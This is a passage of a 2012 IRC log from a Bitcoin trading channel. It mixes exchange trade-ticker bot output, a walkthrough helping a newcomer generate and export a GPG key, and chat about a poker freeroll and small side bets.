06 00:42:44 [GLBSE] [ASICMINER] 5 @ 0.128 = 0.64 BTC [-] Sep 06 00:42:46 [GLBSE] [ASICMINER] 31 @ 0.12721 = 3.9435 BTC [-] Sep 06 00:42:46 [GLBSE] [ASICMINER] 1 @ 0.1272 BTC [-] Sep 06 00:42:47 [GLBSE] [ASICMINER] 100 @ 0.12711 = 12.711 BTC [-] Sep 06 00:42:48 [GLBSE] [ASICMINER] 7 @ 0.12710001 = 0.8897 BTC [-] Sep 06 00:42:50 [GLBSE] [ASICMINER] 85 @ 0.127 = 10.795 BTC [-] Sep 06 00:42:51 [GLBSE] [ASICMINER] 10 @ 0.1266 = 1.266 BTC [-] Sep 06 00:42:52 [GLBSE] [ASICMINER] 10 @ 0.12501001 = 1.2501 BTC [-] Sep 06 00:42:53 [GLBSE] [ASICMINER] 40 @ 0.12501001 = 5.0004 BTC [-] Sep 06 00:42:54 [GLBSE] [ASICMINER] 200 @ 0.12501 = 25.002 BTC [-] Sep 06 00:42:55 [GLBSE] [ASICMINER] 50 @ 0.125 = 6.25 BTC [-] Sep 06 00:48:57 [GLBSE] [TYGRR.BOND-P] 3 @ 0.09999 = 0.3 BTC [+] Sep 06 00:50:48 [GLBSE] [TYGRR.BOND-P] 25 @ 0.09999 = 2.4998 BTC [+] Sep 06 00:52:23 [GLBSE] [GMVT-BOT] 1 @ 0.168 BTC [+] Sep 06 00:53:41 [GLBSE] [ASICMINER] 2 @ 0.12020001 = 0.2404 BTC [-] Sep 06 00:53:43 [GLBSE] [ASICMINER] 33 @ 0.12020001 = 3.9666 BTC [-] Sep 06 00:53:44 [GLBSE] [ASICMINER] 10 @ 0.1202 = 1.202 BTC [-] Sep 06 00:53:46 [GLBSE] [ASICMINER] 2 @ 0.12010001 = 0.2402 BTC [-] Sep 06 00:53:46 [GLBSE] [ASICMINER] 20 @ 0.12010001 = 2.402 BTC [-] Sep 06 00:53:47 [GLBSE] [ASICMINER] 100 @ 0.12 = 12 BTC [-] Sep 06 01:00:26 [GLBSE] [ASICMINER] 15 @ 0.115 = 1.725 BTC [-] Sep 06 01:01:07 [GLBSE] [ASICMINER] 1 @ 0.1149 BTC [-] Sep 06 01:04:45 [GLBSE] [ASICMINER] 2 @ 0.11300001 = 0.226 BTC [-] Sep 06 01:04:47 [GLBSE] [ASICMINER] 2 @ 0.11110001 = 0.2222 BTC [-] Sep 06 01:04:48 [GLBSE] [ASICMINER] 36 @ 0.11110001 = 3.9996 BTC [-] Sep 06 01:04:50 [GLBSE] [ASICMINER] 2 @ 0.11100001 = 0.222 BTC [-] Sep 06 01:04:51 [GLBSE] [ASICMINER] 10 @ 0.11100001 = 1.11 BTC [-] Sep 06 01:06:25 [GLBSE] [ASICMINER] 4 @ 0.1099 = 0.4396 BTC [-] Sep 06 01:06:35 [GLBSE] [FUTUREFUND] 2 @ 0.0001222 = 0.0002 BTC [-] Sep 06 01:08:48 [GLBSE] [BIF.1YR.LOAN] 1 @ 0.91 BTC [-] Sep 06 01:10:10 [GLBSE] [ASICMINER] 8 @ 0.1049 = 0.8392 BTC [-] Sep 06 01:11:04 [GLBSE] [FDBF] 20 @ 0.149 = 2.98 BTC [-] Sep 06 01:11:06 [GLBSE] [ASICMINER] 106 @ 0.1049 = 11.1194 BTC [-] Sep 06 01:11:56 [GLBSE] [OBSI.HRPT] 40 @ 0.10309 = 4.1236 BTC [-] Sep 06 01:12:23 [GLBSE] [ASICMINER] 50 @ 0.105 = 5.25 BTC [+] Sep 06 01:12:46 [GLBSE] [ASICMINER] 10 @ 0.105 = 1.05 BTC [+] Sep 06 01:13:02 [GLBSE] [NASTY] 1 @ 0.627 BTC [-] Sep 06 01:15:30 [GLBSE] [ASICMINER] 7 @ 0.104 = 0.728 BTC [-] Sep 06 01:15:38 [GLBSE] [ASICMINER] 268 @ 0.104 = 27.872 BTC [-] Sep 06 01:15:40 [GLBSE] [ASICMINER] 560 @ 0.105 = 58.8 BTC [+] Sep 06 01:15:41 [GLBSE] [ASICMINER] 101 @ 0.11 = 11.11 BTC [+] Sep 06 01:18:23 [GLBSE] [ASICMINER] 12 @ 0.1039 = 1.2468 BTC [-] Sep 06 01:19:03 [GLBSE] [JAH] 117 @ 0.149 = 17.433 BTC [+] Sep 06 01:19:33 [MPEX] [S.MPOE] 49511 @ 0.0003988 = 19.745 BTC [-] Sep 06 01:19:35 [GLBSE] [PIMP] 31 @ 0.1399 = 4.3369 BTC [-] Sep 06 01:19:47 [GLBSE] [NASTY] 2 @ 0.628 = 1.256 BTC [+] Sep 06 01:19:48 [GLBSE] [NASTY] 5 @ 0.62879 = 3.144 BTC [+] Sep 06 01:20:58 [GLBSE] [OBSI.HRPT] 25 @ 0.10308 = 2.577 BTC [-] Sep 06 01:22:11 [MPEX] [F.GIGA.ETF] 4009 @ 0.00081659 = 3.2737 BTC [-] Sep 06 01:22:13 [GLBSE] [BMF] 25 @ 0.54999 = 13.7498 BTC [-] Sep 06 01:23:20 [GLBSE] [NASTY] 8 @ 0.63 = 5.04 BTC [+] Sep 06 01:23:21 [GLBSE] [NASTY] 2 @ 0.635 = 1.27 BTC [+] Sep 06 01:23:56 ;;later tell lyspooner never heard of one. Sep 06 01:23:57 The operation succeeded. Sep 06 01:24:32 [GLBSE] [ASICMINER] 980 @ 0.105 = 102.9 BTC [+] Sep 06 01:25:23 Damn, ASICMINER went back near IPO price? Sep 06 01:26:39 awww, but it was +50% yest! Sep 06 01:26:58 Now it's +5% Sep 06 01:27:13 [GLBSE] [OBSI.HRPT] 15 @ 0.10308 = 1.5462 BTC [-] Sep 06 01:27:14 [GLBSE] [OBSI.HRPT] 17 @ 0.10306 = 1.752 BTC [-] Sep 06 01:27:18 Looks like someone sold a huge lot Sep 06 01:27:18 these low volume stocks, tsk tsk. Sep 06 01:27:28 !ticker asicmining Sep 06 01:27:29 !ticker asicminer Sep 06 01:27:31 Invalid ticker. Sep 06 01:27:33 [GLBSE:ASICMINER] [Bid: 0.105] [Ask: 0.11] [Spread: 0.005] [Last: 0.105] [24hVol: 433.80514183] [7dAvg: 0.12210553] Sep 06 01:27:40 huge = 4xx btc yeah Sep 06 01:28:06 [GLBSE] [ASICMINER] 29 @ 0.11 = 3.19 BTC [+] Sep 06 01:28:19 [GLBSE] [ASICMINER] 1 @ 0.11 BTC [+] Sep 06 01:28:28 Yea, somebody just took a big dump Sep 06 01:28:54 [GLBSE] [ASICMINER] 2 @ 0.11 = 0.22 BTC [+] Sep 06 01:29:18 It's still only 15000k total value, so 4% is about 2.6% Sep 06 01:29:47 im sorry, say wut ? Sep 06 01:30:22 I mean 4xx BTC is about 2.6% Sep 06 01:30:43 o, of the float ? Sep 06 01:31:10 [GLBSE] [FPGAMINING] 2 @ 0.73 = 1.46 BTC [-] Sep 06 01:31:26 strangely total volume is 6k Sep 06 01:31:39 people bought 9k worth off glbse or what ? Sep 06 01:32:01 [GLBSE] [ASICMINER] 3 @ 0.11 = 0.33 BTC [+] Sep 06 01:32:03 Yeah, you can trade directly with the issuer/others Sep 06 01:32:14 Which doesn't appear in the volume Sep 06 01:32:22 [GLBSE] [ASICMINER] 3 @ 0.11 = 0.33 BTC [+] Sep 06 01:32:50 [GLBSE] [ASICMINER] 7 @ 0.11 = 0.77 BTC [+] Sep 06 01:32:52 [GLBSE] [ASICMINER] 260 @ 0.115 = 29.9 BTC [+] Sep 06 01:33:00 Going back up Sep 06 01:33:02 still has 500-1k to go to .1 Sep 06 01:33:49 I guess people would still like to get IPO prices Sep 06 01:34:21 https://news.ycombinator.com/item?id=4481752 Sep 06 01:35:36 such a fire hazard that thign Sep 06 01:35:43 poliester on top of cardboard ? really ? Sep 06 01:35:48 pour some gasoline in a corner. Sep 06 01:37:37 [GLBSE] [ASICMINER] 7 @ 0.11 = 0.77 BTC [-] Sep 06 01:37:38 [GLBSE] [ASICMINER] 38 @ 0.1051 = 3.9938 BTC [-] Sep 06 01:37:40 [GLBSE] [ASICMINER] 4 @ 0.105 = 0.42 BTC [-] Sep 06 01:40:02 [MPEX] [O.BTCUSD.P170T] 1 @ 0.76378688 BTC [+] Sep 06 01:41:36 [MPEX] [F.GIGA.ETF] 3291 @ 0.00082122 = 2.7026 BTC [+] Sep 06 01:42:29 [MPEX] [O.BTCUSD.C110T] 20 @ 0.15722689 = 3.1445 BTC [+] Sep 06 01:47:42 hi,i am coming Sep 06 01:49:16 i want to buy call options Sep 06 01:50:27 [GLBSE] [ASICMINER] 4 @ 0.11 = 0.44 BTC [+] Sep 06 01:50:32 [GLBSE] [TYGRR.BOND-P] 3 @ 0.09999 = 0.3 BTC [+] Sep 06 01:50:49 long Expiration,high strike Sep 06 01:53:21 i want to buy call options,can anyone help me how to buy? Sep 06 01:54:29 Ask mircea_popescu, his MPEX exchange deals with options Sep 06 01:55:07 yes papaso. what do you need ? Sep 06 01:55:30 yes ,i want to buy call options Sep 06 01:56:00 ok. do you have a gpg identity ? Sep 06 01:56:02 ;;ident papaso Sep 06 01:56:08 Nick 'papaso', with hostmask 'papaso!b7e13886@gateway/web/freenode/ip.183.225.56.134', is not identified. Sep 06 01:56:57 i dont understand GPG,i email to you, you said we talk here Sep 06 01:57:16 ah ok. Sep 06 01:57:23 so , first of all you need to get gpg. Sep 06 01:57:30 what system do you run ? windows ? Sep 06 01:57:43 win xp Sep 06 01:57:49 ok. Sep 06 01:58:12 http://www.gpg4win.org/about.html Sep 06 01:58:14 you need that. Sep 06 01:59:53 2.10 or 2.11? Sep 06 02:00:41 doesn't really matter. Sep 06 02:00:51 ok Sep 06 02:01:41 anothers ques,i can not open bitoption.org, you know why? Sep 06 02:02:29 [GLBSE] [OBSI.HRPT] 10 @ 0.1035 = 1.035 BTC [+] Sep 06 02:02:31 i have no ideea. Sep 06 02:02:49 A market where traded were options to buy and sell bitcoins at future points in time. The service has been suspended since September 2011. Sep 06 02:02:55 seems it's been dead a long time. Sep 06 02:08:55 ok i download it Sep 06 02:09:11 pls show me the next how to do Sep 06 02:09:48 well, did you install it ? Sep 06 02:10:36 [GLBSE] [GSDPT] 18 @ 0.003393 = 0.0611 BTC [+] Sep 06 02:10:54 install already Sep 06 02:11:07 ok. open up command prompt and say Sep 06 02:11:10 [GLBSE] [GSDPT] 1 @ 0.003393 BTC [+] Sep 06 02:11:12 gpg --gen-key Sep 06 02:13:00 do you want to create a back up copy? Sep 06 02:13:22 or do it later? Sep 06 02:13:24 i'm sorry ? Sep 06 02:13:48 gen key asked Sep 06 02:13:59 sure, make a backup. save it somewhere safe. Sep 06 02:15:12 then GPG want me to type passphrase and quality Sep 06 02:15:24 so pick a STRONG passphrase Sep 06 02:15:32 minimum 12 chars, letters, numbers, symbols. Sep 06 02:15:37 and pick 4096 bit Sep 06 02:15:40 more then 13? Sep 06 02:15:49 [GLBSE] [OBSI.HRPT] 10 @ 0.1035 = 1.035 BTC [+] Sep 06 02:16:02 what means quality? Sep 06 02:16:25 13 works. the longer the better, but don't forget it. Sep 06 02:16:38 if you do you're pretty much screwed. Sep 06 02:16:55 ok i done Sep 06 02:16:59 don't use any words in it either. ok. Sep 06 02:17:05 gpg --armor --output pubkey.txt --export 'Your Name' Sep 06 02:17:20 it will give you some text. you email me that. Sep 06 02:18:37 then save? Sep 06 02:18:48 sure. Sep 06 02:18:54 you can get it again any time the same way. Sep 06 02:20:01 then i open GPG again Sep 06 02:20:21 did you email me your key ? Sep 06 02:20:36 in brief lot of information Sep 06 02:21:11 hm ? Sep 06 02:21:12 [GLBSE] [ASICMINER] 2 @ 0.1199 = 0.2398 BTC [+] Sep 06 02:21:36 i need to tell you the key id? Sep 06 02:21:56 no. Sep 06 02:21:58 you need to go Sep 06 02:22:01 gpg --armor --output pubkey.txt --export 'Your Name' Sep 06 02:22:06 it will give you some text. Sep 06 02:22:12 you need to email me that text. Sep 06 02:24:16 where is the armor? Sep 06 02:24:33 where is the armor ?! Sep 06 02:24:45 what do you mean ? Sep 06 02:25:20 you said i must go to gpg --armor --output pubkey.txt --export 'Your Name' Sep 06 02:25:35 you just put that in command prompt Sep 06 02:25:53 obviously replace your name with... your name. whatever you entered when you made the key. Sep 06 02:26:11 mircea_popescu: you need a step by step tutorial Sep 06 02:26:22 And just send that to ppl Sep 06 02:26:31 rdponticelli http://polimedia.us/bitcoin/faq.html#6 it's there. Sep 06 02:26:39 problem is, people don't even have gpg. what am i to do ? Sep 06 02:27:02 A tutorial for ppl who don't have gpg Sep 06 02:27:04 I know the other Sep 06 02:27:22 might be an ideea, this. Sep 06 02:27:23 :) Sep 06 02:27:42 a well, my faq will grow to epic proportions, it will pass 250kb, be even larger than nefario's pages. Sep 06 02:28:03 And don't forget to put something like: do it on a clean machine Sep 06 02:28:12 [GLBSE] [JTME] 1 @ 0.915 BTC [-] Sep 06 02:28:38 [GLBSE] [JTME] 9 @ 0.8 = 7.2 BTC [-] Sep 06 02:28:39 myeah. Sep 06 02:28:59 If you're using that mocosoft crap chances are that your keys won't be safe anyway... Sep 06 02:29:12 And all that jazz Sep 06 02:29:13 so i should put an os comparison char too ? Sep 06 02:29:21 i mean... it has to end somewhere, this faq Sep 06 02:29:21 [GLBSE] [FDBF] 4 @ 0.15 = 0.6 BTC [+] Sep 06 02:29:30 meanwhile, i have no email. papaso you ok in there ? Sep 06 02:29:39 Yeah, ponder your resources Sep 06 02:30:05 But is more waste of resources tell step by step to every customer Sep 06 02:30:14 i am in the key manager web, and i dont know how to do next Sep 06 02:30:15 [GLBSE] [ASICMINER] 20 @ 0.1199 = 2.398 BTC [+] Sep 06 02:30:37 rdponticelli i've run it for months never quite had the problem. people manage in general. Sep 06 02:30:44 Ok Sep 06 02:30:51 [GLBSE] [HYDRO.BONDS] 3 @ 1.559 = 4.677 BTC [-] Sep 06 02:30:55 papaso i have no idea what a key manager web is. Sep 06 02:31:01 Ok it was just and idea :) Sep 06 02:31:15 what you need to do is, open command prompt, put the string i gave you in there, and paste the result into an email. Sep 06 02:31:27 if you do what you want to do rather than what i tell you to do we're just wasting our time here. Sep 06 02:31:38 when you open GPA, you will see the key manager Sep 06 02:31:57 mkay, well this has gone for long enough i guess. Sep 06 02:32:11 papaso http://www.madboa.com/geek/gpg-quickstart/ here's the manual. Sep 06 02:32:16 please send me your public key. Sep 06 02:32:18 [GLBSE] [ASICMINER] 16 @ 0.1199 = 1.9184 BTC [+] Sep 06 02:32:18 [GLBSE] [ASICMINER] 19 @ 0.12 = 2.28 BTC [+] Sep 06 02:32:19 that's pretty much it. Sep 06 02:33:07 [GLBSE] [DMC] 1 @ 0.08889 BTC [-] Sep 06 02:34:40 [MPEX] [F.GIGA.ETF] 14709 @ 0.00081874 = 12.0428 BTC [-] Sep 06 02:34:41 [MPEX] [F.GIGA.ETF] 2300 @ 0.00082133 = 1.8891 BTC [+] Sep 06 02:34:46 key id? Sep 06 02:35:24 [GLBSE] [ASICMINER] 35 @ 0.12 = 4.2 BTC [+] Sep 06 02:36:50 you find your keyid by saying gpg --list-keys Sep 06 02:37:18 mpex keyid is F1B69921 Sep 06 02:40:03 [MPEX] [S.MPOE] 16316 @ 0.00040019 = 6.5295 BTC [+] Sep 06 02:40:05 [MPEX] [S.MPOE] 23684 @ 0.0004007 = 9.4902 BTC [+] Sep 06 02:40:58 [MPEX] [O.BTCUSD.P160T] 1 @ 0.64860632 BTC [+] Sep 06 02:42:50 do you speak chinese? Sep 06 02:43:10 sadly i don't. Sep 06 02:43:26 however, markac does, Sep 06 02:43:28 try Sep 06 02:43:37 [GLBSE] [TYGRR.BOND-P] 9 @ 0.09999 = 0.8999 BTC [+] Sep 06 02:43:39 .tr 梵天 Sep 06 02:43:40 mircea_popescu: "Brahma" (zh-CN to en, translate.google.com) Sep 06 02:44:54 i think i need stup by stup HOWTO Sep 06 02:45:43 boze i first here GPA Sep 06 02:45:50 read up the conversation, it's there. Sep 06 02:47:49 usagi: "My name is rabbit ." (ja to en, translate.google.com) Sep 06 02:52:01 [MPEX] [S.MPOE] 9058 @ 0.00039902 = 3.6143 BTC [-] Sep 06 02:52:02 [MPEX] [S.MPOE] 8010 @ 0.00039875 = 3.194 BTC [-] Sep 06 02:52:03 [MPEX] [S.MPOE] 2032 @ 0.00039789 = 0.8085 BTC [-] Sep 06 02:52:46 [GLBSE] [BIB.PIRATE] 10 @ 0.1 = 1 BTC [+] Sep 06 02:52:55 [GLBSE] [ASICMINER] 33 @ 0.12 = 3.96 BTC [+] Sep 06 02:53:57 [GLBSE] [OBSI.HRPT] 4 @ 0.1035 = 0.414 BTC [+] Sep 06 02:54:54 AGAIN,first "new key" your name: papaso then email: 23@qq.com then create back up copy then enter passphrase then re-enter ,then secret-key-5122FEE3.asc, pls show me howto..... Sep 06 02:55:28 [MPEX] [S.MPOE] 1668 @ 0.00039789 = 0.6637 BTC [-] Sep 06 02:55:29 [MPEX] [S.MPOE] 19484 @ 0.00039784 = 7.7515 BTC [-] Sep 06 02:56:20 gpg --armor --output pubkey.txt --export '5122FEE3' Sep 06 02:59:05 [MPEX] [F.GIGA.ETF] 4000 @ 0.00083036 = 3.3214 BTC [+] Sep 06 03:01:23 [GLBSE] [ASICMINER] 33 @ 0.1199 = 3.9567 BTC [-] Sep 06 03:05:36 name:secret-key-54296214.asc then i change to: gpg --armor --output pubkey.txt --export 'papaso' then save in folder: desktop then push save? Sep 06 03:10:24 [GLBSE] [ASICMINER] 33 @ 0.12 = 3.96 BTC [+] Sep 06 03:10:45 [GLBSE] [TYGRR.BOND-P] 10 @ 0.09999 = 0.9999 BTC [+] Sep 06 03:10:47 [GLBSE] [TYGRR.BOND-P] 2 @ 0.099999 = 0.2 BTC [+] Sep 06 03:11:57 ... maybe ? Sep 06 03:12:03 are you renaming a file ? Sep 06 03:16:00 let me study chinese HOWTO Sep 06 03:18:41 [MPEX] [S.MPOE] 44600 @ 0.00039784 = 17.7437 BTC [-] Sep 06 03:20:22 [MPEX] [S.MPOE] 10176 @ 0.00039784 = 4.0484 BTC [-] Sep 06 03:20:23 [MPEX] [S.MPOE] 9124 @ 0.00039784 = 3.6299 BTC [-] Sep 06 03:30:59 [MPEX] [S.MPOE] 34300 @ 0.0003986 = 13.672 BTC [+] Sep 06 03:31:15 and faq update, if anyone's curious. Sep 06 03:31:20 http://polimedia.us/bitcoin/faq.html Sep 06 03:31:34 [GLBSE] [COGNITIVE] 4 @ 0.62 = 2.48 BTC [+] Sep 06 03:31:35 [GLBSE] [COGNITIVE] 30 @ 0.635 = 19.05 BTC [+] Sep 06 03:31:36 [GLBSE] [COGNITIVE] 3 @ 0.645 = 1.935 BTC [+] Sep 06 03:31:37 [GLBSE] [COGNITIVE] 1 @ 0.648 BTC [+] Sep 06 03:31:38 [GLBSE] [COGNITIVE] 4 @ 0.6495 = 2.598 BTC [+] Sep 06 03:31:39 [GLBSE] [COGNITIVE] 44 @ 0.65 = 28.6 BTC [+] Sep 06 03:32:10 [MPEX] [S.MPOE] 15506 @ 0.0003986 = 6.1807 BTC [+] Sep 06 03:32:11 [MPEX] [S.MPOE] 28428 @ 0.0004007 = 11.3911 BTC [+] Sep 06 03:32:13 [MPEX] [S.MPOE] 3866 @ 0.00040084 = 1.5496 BTC [+] Sep 06 03:32:21 [GLBSE] [GSDPT] 11732 @ 0.003393 = 39.8067 BTC [+] Sep 06 03:32:23 [GLBSE] [GSDPT] 7877 @ 0.0034 = 26.7818 BTC [+] Sep 06 03:32:24 [GLBSE] [GSDPT] 10391 @ 0.0034 = 35.3294 BTC [+] Sep 06 03:34:11 [GLBSE] [GSDPT] 4609 @ 0.0034 = 15.6706 BTC [+] Sep 06 03:34:23 aaaand it's gone Sep 06 03:35:15 hm? Sep 06 03:36:00 i saw the large buys, i checked the mkt depth, noticed 4.6k outstandign Sep 06 03:36:04 and right then they sold. Sep 06 03:39:05 !ticker s.dice Sep 06 03:39:06 !ticker gsdpt Sep 06 03:39:06 [MPEX:S.DICE] 1day: 0 / 0 / 0 (0 shares, 0 BTC), 30day: 0.0032 / 0.00327279 / 0.0034 (3537514 shares, 11,577.55 BTC) Sep 06 03:39:10 [GLBSE:GSDPT] [Bid: 0.0032] [Ask: 0.0034] [Spread: 0.0002] [Last: 0.0034] [24hVol: 129.557254] [7dAvg: 0.00327343] Sep 06 03:39:39 oh, i've been outwitted by time :( Sep 06 03:39:57 huh ? Sep 06 03:40:06 Trying to be part of a cryptocurrency without knowing how to use gpg is like trying to be part of the 60s without knowing how to use a bong. Sep 06 03:40:09 lol Sep 06 03:40:27 i should've ran the ticker comparison before 8pm eastern us Sep 06 03:40:37 mod6 ain't that the truth! Sep 06 03:40:44 :D Sep 06 03:41:20 I used to prefer hookas myself Sep 06 03:41:58 [GLBSE] [FUTUREFUND] 5 @ 0.0001222 = 0.0006 BTC [-] Sep 06 03:42:25 [GLBSE] [FUTUREFUND] 2 @ 0.0001222 = 0.0002 BTC [-] Sep 06 03:42:42 [GLBSE] [ASICMINER] 33 @ 0.113003 = 3.7291 BTC [-] Sep 06 03:43:25 [MPEX] [F.GIGA.ETF] 1301 @ 0.00083036 = 1.0803 BTC [+] Sep 06 03:44:44 [MPEX] [S.MPOE] 7847 @ 0.00039784 = 3.1219 BTC [-] Sep 06 03:44:45 [MPEX] [S.MPOE] 19753 @ 0.00039782 = 7.8581 BTC [-] Sep 06 03:47:34 lol well... as a general point Sep 06 03:48:39 ;;later tell deadterra you prolly want to issue more gsdpt Sep 06 03:48:40 The operation succeeded. Sep 06 03:50:49 [MPEX] [S.MPOE] 35847 @ 0.00039782 = 14.2607 BTC [-] Sep 06 03:50:50 [MPEX] [S.MPOE] 5553 @ 0.00039763 = 2.208 BTC [-] Sep 06 03:53:16 [MPEX] [S.MPOE] 9647 @ 0.00039763 = 3.8359 BTC [-] Sep 06 03:53:18 [MPEX] [S.MPOE] 9953 @ 0.00039754 = 3.9567 BTC [-] Sep 06 03:56:46 5 BTC freeroll on sealswithclubs starting in 1 hour and a half by the way... 164 players so far, a few places left. Sep 06 03:57:39 [GLBSE] [BTC-MINING] 75 @ 0.9998 = 74.985 BTC [-] Sep 06 03:58:26 [GLBSE] [ASICMINER] 33 @ 0.12 = 3.96 BTC [+] Sep 06 03:58:50 Looks like people are buying BTC-MINING Sep 06 03:59:38 BTC-Mining: do you need chips to play in that? Sep 06 03:59:56 No, it's a freeroll... Sep 06 04:00:17 Almost ALL poker websites in existence conducts regular freerolls. Sep 06 04:00:27 [MPEX] [B.MPCD.C] 150 @ 0.00101467 = 0.1522 BTC [-] Sep 06 04:00:29 [MPEX] [B.MPCD.C] 9850 @ 0.001001 = 9.8599 BTC [-] Sep 06 04:00:29 Usually for ~ 50 - 100 USD Sep 06 04:00:29 [MPEX] [B.MPCD.C] 329 @ 0.0012103 = 0.3982 BTC [+] Sep 06 04:00:30 [MPEX] [B.MPCD.B] 10000 @ 0.0010005 = 10.005 BTC [-] Sep 06 04:00:31 [MPEX] [B.MPCD.A] 10000 @ 0.0010003 = 10.003 BTC [-] Sep 06 04:00:32 [MPEX] [B.MPCD.C] 10000 @ 0.001001 = 10.01 BTC [-] Sep 06 04:00:33 [MPEX] [B.MPCD.B] 10000 @ 0.0010005 = 10.005 BTC [-] Sep 06 04:00:34 [GLBSE] [ASICMINER] 17 @ 0.12 = 2.04 BTC [+] Sep 06 04:00:35 [MPEX] [B.MPCD.A] 10000 @ 0.0010003 = 10.003 BTC [-] Sep 06 04:00:36 well, i'll join in then Sep 06 04:00:40 [MPEX] [B.MPCD.C] 10000 @ 0.001001 = 10.01 BTC [-] Sep 06 04:00:41 [MPEX] [B.MPCD.B] 10000 @ 0.0010005 = 10.005 BTC [-] Sep 06 04:00:43 [MPEX] [B.MPCD.A] 10000 @ 0.0010003 = 10.003 BTC [-] Sep 06 04:00:44 [MPEX] [B.MPCD.A] 10000 @ 0.0010003 = 10.003 BTC [-] Sep 06 04:00:45 [MPEX] [B.MPCD.B] 10000 @ 0.0010005 = 10.005 BTC [-] Sep 06 04:00:46 [MPEX] [B.MPCD.C] 10000 @ 0.001001 = 10.01 BTC [-] Sep 06 04:01:01 weren;t they doing those hourly ? Sep 06 04:01:20 No, not seals, they're too small. Doing that weekly. Sep 06 04:01:36 They do a 0.05 BTC freeroll hourly tho, with usually 10 people in it. Sep 06 04:02:11 Only some large poker networks do daily/multiple time a day freerolls. Sep 06 04:03:33 BTC-Mining: can you tell me how long i should expect it to last if i don't suck ass tonight? Sep 06 04:04:50 Eh, no idea. Sep 06 04:04:55 Can go for a few hours. Sep 06 04:05:41 There's always breaks tho Sep 06 04:06:18 and of course the minimum blind go up every few minute to force the game to go end up faster. Sep 06 04:07:06 BTC-Mining: are you playing? Sep 06 04:07:08 well smickles you'd have 1: 200 odds to win 50 bux Sep 06 04:07:14 so it'd be mostly for hte fun Sep 06 04:07:24 Yup Sep 06 04:07:42 BTC-Mining: well, tell me if we hit the same table :) Sep 06 04:08:06 There's actually 17 position paids Sep 06 04:08:11 (i assume you nick is different there) Sep 06 04:08:23 and 116 entrants Sep 06 04:09:12 25.00%/15.00%/10.00%/7.50%/4 x 5%/9 x 2.5% Sep 06 04:09:20 mircea_popescu: so you'll bet me 200 btc agianst my one that i won't win it? Sep 06 04:09:26 :D Sep 06 04:09:40 i'll bet 2 btc against your .01 Sep 06 04:09:47 let's not drive me bankrupt just yet. Sep 06 04:09:53 mircea: deal from here... Sep 06 04:10:02 If you want to take it. Sep 06 04:10:04 you betting that you don't win or that he doesn't win BTC-Mining ? Sep 06 04:10:19 No, betting for myself winning Sep 06 04:10:28 i'll want .02 btc from you. Sep 06 04:10:45 hmm, okay then Sep 06 04:10:47 heh, i'll take the bet mircea_popescu. Sep 06 04:10:57 lol ok. how do we verify this ? Sep 06 04:11:01 you get .01 if i lose, i get 2 if i win. Sep 06 04:11:09 um Sep 06 04:11:10 You can check the tournament results Sep 06 04:11:12 MNW got all over you guys. Sep 06 04:11:22 BTC-Mining ok, but what do you play as ? Sep 06 04:11:32 BTC-Mining: is the winner announced somehow? Sep 06 04:11:43 Namjies Sep 06 04:11:51 and you're smickles, smickles ? Sep 06 04:11:58 yup Sep 06 04:11:59 same nick Sep 06 04:12:02 kays. Sep 06 04:12:05 You can view the list of final position for the tournament from the tournament's lobby Sep 06 04:12:20 I believe Sep 06 04:12:22 im too lazy but i trust you'll be keeping each other honest lol Sep 06 04:13:26 Excellent Sep 06 04:13:39 i'll screenshoot it :D Sep 06 04:13:41 [GLBSE] [ASICMINER] 33 @ 0.113003 = 3.7291 BTC [-] Sep 06 04:14:19 heh, if i had a few hundered spare gig, i'd record my play Sep 06 04:14:43 I don't think I've ever been first in a tournament yet... Although I'm used to larger pools of players. Sep 06 04:15:05 well good luck to both of ya. Sep 06 04:15:10 :D Sep 06 04:15:40 heh, i suppose it's sorta a sponsorship Sep 06 04:17:04 Well first place is 25%, or 1.25 BTC. If you get first, you get an extra 2 BTC from mircea. Sep 06 04:17:30 But by the end of a tournament, you end up with good players. Gets harder and harder Sep 06 04:18:31 Oh, I have an mpex cap for the tournament? Sep 06 04:18:40 [GLBSE] [ASICMINER] 2 @ 0.117 = 0.234 BTC [+] Sep 06 04:18:42 [MPEX] [B.MPCD.C] 10000 @ 0.00102096 = 10.2096 BTC [+] Sep 06 04:18:43 [MPEX] [B.MPCD.C] 10000 @ 0.00102096 = 10.2096 BTC [+] Sep 06 04:18:48 [MPEX] [B.MPCD.C] 10000 @ 0.00102096 = 10.2096 BTC [+] Sep 06 04:18:50 [MPEX] [B.MPCD.C] 10000 @ 0.00102096 = 10.2096 BTC [+] Sep 06 04:18:53 [MPEX] [B.MPCD.C] 10000 @ 0.00102096 = 10.2096 BTC [+] Sep 06 04:18:55 [MPEX] [B.MPCD.C] 10000 @ 0.00102096 = 10.2096 BTC [+] Sep 06 04:19:01 [MPEX] [B.MPCD.C] 10000 @ 0.00102096 = 10.2096 BTC [+] Sep 06 04:19:02 [MPEX] [B.MPCD.C] 10000 @ 0.00102096 = 10.2096 BTC [+] Sep 06 04:19:04 [MPEX] [B.MPCD.C] 10000 @ 0.00102096 = 10.2096 BTC [+] Sep 06 04:19:06 [MPEX] [B.MPCD.C] 10000 @ 0.00102096 = 10.2096 BTC [+] Sep 06 04:19:08 [MPEX] [B.MPCD.C] 10000 @ 0.00102096 = 10.2096 BTC [+] Sep 06 04:19:13 [MPEX] [B.MPCD.C] 10000 @ 0.00102096 = 10.2096 BTC [+] Sep 06 04:19:15 [MPEX] [B.MPCD.C] 10000 @ 0.00102096 = 10.2096 BTC [+] Sep 06 04:19:17 [MPEX] [B.MPCD.C] 10000 @ 0.00102096 = 10.2096 BTC [+] Sep 06 04:19:19 [MPEX] [B.MPCD.C] 10000 @ 0.00102096 = 10.2096 BTC [+] Sep 06 04:19:21 [MPEX] [B.MPCD.C] 10000 @ 0.00102096 = 10.2096 BTC [+] Sep 06 04:19:23 [MPEX] [B.MPCD.C] 10000 @ 0.00102096 = 10.2096 BTC [+] Sep 06 04:19:27 [MPEX] [B.MPCD.C] 10000 @ 0.00102096 = 10.2096 BTC [+] Sep 06 04:19:27 . Sep 06 04:19:28 [MPEX] [B.MPCD.C] 10000 @ 0.00102096 = 10.2096 BTC [+] Sep 06 04:19:28 is something stuck Sep 06 04:19:29 . Sep 06 04:19:29 [MPEX] [B.MPCD.C] 10000 @ 0.00102096 = 10.2096 BTC [+] Sep 06 04:19:30 . Sep 06 04:19:30 [MPEX] [B.MPCD.C] 10000 @ 0.00102096 = 10.2096 BTC [+] Sep 06 04:19:32 [MPEX] [B.MPCD.C] 10000 @ 0.00102096 = 10.2096 BTC [+] Sep 06 04:19:34 [MPEX] [B.MPCD.C] 10000 @ 0.00102096 = 10.2096 BTC [+] Sep 06 04:19:37 [MPEX] [B.MPCD.C] 10000 @ 0.00102096 = 10.2096 